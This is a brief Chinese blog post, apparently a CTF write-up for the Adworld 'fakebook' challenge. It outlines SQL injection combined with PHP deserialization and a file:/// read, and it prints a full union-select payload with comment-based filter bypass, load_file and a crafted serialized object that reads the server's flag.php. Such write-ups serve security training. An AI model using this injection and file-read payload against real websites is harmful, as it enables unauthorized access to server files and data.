攻防世界 fakebook writeup

两种姿势。

1.对view.php界面进行sql注入，反序列化,file:///读取flag文件

2.可能是作者过滤问题，sql注入后写一句话没成功但是可以直接load_file flag文件。

view.php?no=-1/**/union/**/select/**/1,load_file('/var/www/html/flag.php'),3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

posted @ 2020-04-01 16:42 Zhu013 阅读(849) 评论(0) 收藏举报

刷新页面返回顶部

欧欧欧欧提大人

来到了就是有缘份，一起学习吧

攻防世界 fakebook writeup

公告